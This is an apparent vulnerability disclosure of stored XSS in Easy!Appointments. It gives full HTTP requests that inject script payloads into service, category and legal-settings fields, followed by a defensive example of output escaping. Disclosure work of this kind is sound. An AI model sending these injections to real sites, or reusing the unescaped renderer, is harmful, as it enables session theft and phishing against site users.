Multiple XSS in Create/Update Function, Version 1.4.3 and 1.5.0-dev.2 in alextselegidis/easyappointments
Reported on
Mar 28th 2023
Description
Stored XSS on create/update of services, categories and settings. I tested on 1.4.3 (demo site) and 1.5.0-dev.2.
Proof of Concept
Install
I installed from the develop branch. When the install finished, the footer displayed version v1.5.0-dev.2.
At the time I ran this, the commit shown in the image below was the latest.
webUI
alert on demo site: Version 1.4.3
Reproduce on Local
Request:
POST /easyappointments/index.php/services/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 482
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=Service%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%23ebe07c&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0&service%5Bid%5D=1
Response:
{"success":true,"id":1}
Request:
POST /easyappointments/index.php/services/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 448
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/services
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=u4ub9lhann4css234pgt235217t2gfqb; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&service%5Bname%5D=S2%22%3E%3Cscript%3Ealert(String.fromCharCode(88))%3C%2Fscript%3E&service%5Bduration%5D=30&service%5Bprice%5D=0&service%5Bcurrency%5D=&service%5Bdescription%5D=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E&service%5Blocation%5D=&service%5Bcolor%5D=%237cbae8&service%5Bavailabilities_type%5D=flexible&service%5Battendants_number%5D=1&service%5Bis_private%5D=0
Response:
{"success":true,"id":3}
Request:
POST /easyappointments/index.php/categories/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 214
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories')%3C%2Fscript%3E
Response:
{"success":true,"id":3}
Request:
POST /easyappointments/index.php/categories/update HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/categories
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=nfn5oc2bm60pr5lkaede42b97rgiag83; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&category%5Bname%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bdescription%5D=categories%22%3E%3Cscript%3Ealert('categories2')%3C%2Fscript%3E&category%5Bid%5D=2
Response:
{"success":true,"id":2}
Request:
POST /easyappointments/index.php/legal_settings/save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 711
Origin: http://localhost
Connection: close
Referer: http://localhost/easyappointments/index.php/legal_settings
Cookie: csrfCookie=3507348b3bb298f75c607b27d855dad1; ea_session=96k2nk94s2cihcbevlmanv2mf76c84mk; csrf_cookie=1ad54974bc783c6d6831ad34a3b1ceb3
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
csrf_token=1ad54974bc783c6d6831ad34a3b1ceb3&legal_settings%5B0%5D%5Bname%5D=display_cookie_notice&legal_settings%5B0%5D%5Bvalue%5D=0&legal_settings%5B1%5D%5Bname%5D=cookie_notice_content&legal_settings%5B1%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E&legal_settings%5B2%5D%5Bname%5D=display_terms_and_conditions&legal_settings%5B2%5D%5Bvalue%5D=0&legal_settings%5B3%5D%5Bname%5D=terms_and_conditions_content&legal_settings%5B3%5D%5Bvalue%5D=Terms+and+conditions+content.&legal_settings%5B4%5D%5Bname%5D=display_privacy_policy&legal_settings%5B4%5D%5Bvalue%5D=1&legal_settings%5B5%5D%5Bname%5D=privacy_policy_content&legal_settings%5B5%5D%5Bvalue%5D=1%22%3E%3Cscript%3Ealert('abc')%3C%2Fscript%3E
Alert
Open the booking link or the index page to view the alert.
Alert with setting
Impact
An XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.
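The following is an added example, not code from the report or from the Easy!Appointments project. It parses the body of the services/update request shown above (trimmed to the relevant fields), then renders the stored service name and description two ways: the unsafe string-concatenation pattern that lets the stored value execute, and a hardened renderer that HTML-escapes every untrusted value. The function names, the trimmed body and the check helper are assumptions made for the example.

```javascript
// Added example (not part of the report or the Easy!Appointments code base).
// Shows why the stored service fields execute on the booking page and how
// output encoding at the render point neutralises them.

// Constructed: the services/update body from the report, reduced to the
// fields this example uses. Values are still URL-encoded as captured.
const CAPTURED_BODY =
  'service%5Bname%5D=Service%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E' +
  '&service%5Bdescription%5D=1%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E' +
  '&service%5Bid%5D=1';

// Decode the x-www-form-urlencoded body into the record the server stores.
// URLSearchParams decodes %5B/%5D in keys, so the keys become "service[name]" etc.
function parseServiceFromBody(body) {
  const params = new URLSearchParams(body);
  return {
    id: params.get('service[id]'),
    name: params.get('service[name]'),
    description: params.get('service[description]'),
  };
}

// Vulnerable pattern (hypothetical renderer): stored values are concatenated
// straight into markup, so the '">' in the name closes the attribute and the
// <script> element that follows is parsed as real HTML.
function renderServiceCardUnsafe(service) {
  return (
    `<div class="service" data-name="${service.name}">` +
    `<h3>${service.name}</h3><p>${service.description}</p></div>`
  );
}

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened pattern: every untrusted value is escaped before it enters markup.
// The stored payload is still displayed, but as literal text.
function renderServiceCardSafe(service) {
  return (
    `<div class="service" data-name="${escapeHtml(service.name)}">` +
    `<h3>${escapeHtml(service.name)}</h3><p>${escapeHtml(service.description)}</p></div>`
  );
}

// Check helper: does the rendered fragment contain a real <script> tag
// (as opposed to the escaped text "&lt;script&gt;")?
function containsScriptTag(html) {
  return /<\/?script\b/i.test(html);
}

// Stand-alone run: show both renderings for the captured record.
const storedService = parseServiceFromBody(CAPTURED_BODY);
console.log('stored name    :', storedService.name);
console.log('unsafe render  :', renderServiceCardUnsafe(storedService));
console.log('safe render    :', renderServiceCardSafe(storedService));
console.log('unsafe executes:', containsScriptTag(renderServiceCardUnsafe(storedService)));
console.log('safe executes  :', containsScriptTag(renderServiceCardSafe(storedService)));
```

Escaping at output is the fix that covers every field at once; rejecting `<` on input would not help against values that are already stored. Since the impact section mentions session theft, the `ea_session` cookie should also carry the HttpOnly flag so a successful injection cannot read it directly.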